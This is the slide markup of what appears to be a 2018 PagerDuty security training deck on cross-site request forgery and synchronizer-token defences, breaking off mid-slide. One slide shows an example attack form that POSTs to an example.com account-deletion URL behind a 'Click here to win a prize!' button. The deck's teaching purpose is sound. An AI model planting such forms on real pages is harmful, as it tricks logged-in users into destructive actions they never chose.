          <p:cNvPr id="1743" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940505" y="2661621"/>
            <a:ext cx="12502990" cy="7890396"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1744" name="You have been logged out."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9721150" y="2995429"/>
            <a:ext cx="4975003"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3000">
                <a:solidFill>
                  <a:srgbClr val="C62818"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>You have been logged out.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1745" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9930031" y="7682570"/>
            <a:ext cx="4557242" cy="618364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="A6AAA9"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1746" name="Login"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11663638" y="4761893"/>
            <a:ext cx="1056724" cy="587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900">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1747" name="Password"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9942356" y="7146993"/>
            <a:ext cx="1438078"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300">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1748" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9930031" y="6200387"/>
            <a:ext cx="4557242" cy="618364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="A6AAA9"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:hueOff val="384618"/>
                    <a:satOff val="3869"/>
                    <a:lumOff val="5802"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1749" name="Username"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9909909" y="5625968"/>
            <a:ext cx="1502972"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300">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Username</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3" name="“Couldn’t you do it as a POST request?”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="9300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“Couldn’t you do it as a POST request?”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1754" name="PagerDuty_logo_WHITE.png" descr="PagerDuty_logo_WHITE.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755"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756" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1757"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1"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762"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763" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1764" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1765" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-399654" y="1126118"/>
            <a:ext cx="24878508" cy="5548820"/>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1766" name="&lt;form action=&quot;https://example.com/account/delete&quot;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522224" y="2114591"/>
            <a:ext cx="21028150" cy="4079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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;form</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"https://example.com/account/delete"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"POST"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:satOff val="-3355"/>
                  <a:lumOff val="26614"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"submit"</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:satOff val="18648"/>
                  <a:lumOff val="5971"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"Click here to win a prize!" </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1767" name="Click here to win a prize!"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="9034632"/>
            <a:ext cx="9296400" cy="1574801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DCDEE0"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="A6AAA9"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000"/>
          </a:gradFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="A6AAA9"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="74246" dir="4340758">
              <a:srgbClr val="000000">
                <a:alpha val="55594"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Click here to win a prize!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1768" name="HTML"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20282175" y="14326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HTML</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2"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77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774" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1775" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1776" name="fry-panic.png" descr="fry-panic.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2050953" y="-1850586"/>
            <a:ext cx="18508127" cy="1708917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tory Time!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Story Time!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="325"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326"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327" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="329" name="story-time.png" descr="story-time.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9188174" y="2699262"/>
            <a:ext cx="15002434" cy="10926773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>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0" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13172" y="5166816"/>
            <a:ext cx="24357657" cy="4652368"/>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1781" name="&lt;input…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5433599" y="5453062"/>
            <a:ext cx="11752884" cy="4079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5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:satOff val="-3355"/>
                  <a:lumOff val="26614"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"hidden"</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:satOff val="18648"/>
                  <a:lumOff val="5971"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"csrf_token"</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:satOff val="18648"/>
                  <a:lumOff val="5971"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"0VIxQKB0LThHfuORoQz8LNt"</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:satOff val="18648"/>
                  <a:lumOff val="5971"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1782" name="Synchronizer Token"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Synchronizer Token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1783"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784"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785" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1786" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1787" name="HTML"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20282175" y="54966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HTML</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1" name="Token should be…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Token should be…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1792" name="Unique per user and per session.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Unique per user and </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>per session</a:t>
            </a:r>
            <a:r>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Large </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>random</a:t>
            </a:r>
            <a:r>
              <a:t> value.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
